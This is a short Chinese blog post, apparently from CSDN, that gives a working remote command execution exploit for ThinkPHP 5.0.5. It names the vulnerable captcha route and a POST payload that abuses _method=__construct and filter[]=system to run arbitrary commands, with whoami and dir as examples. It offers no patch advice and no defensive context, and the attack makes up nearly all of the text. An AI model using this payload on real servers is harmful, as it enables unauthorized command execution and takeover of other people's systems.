前言
这里的thinkphp版本为5.0.5
访问
http://xx.xx.xx.xx:8080/index.php/?s=captcha
payload
_method=__construct&filter[]=system&method=GET&get[]=系统命令
示例如下
(1)post传入_method=__construct&filter[]=system&method=GET&get[]=whoami
进行命令执行
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/f0aca94d9d901bd30b7ddcc978849c3f.png)
(2)post传入_method=__construct&filter[]=system&method=GET&get[]=dir
进行命令执行
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/68819bd2b177f03f7ba73fe5faf343d0.png)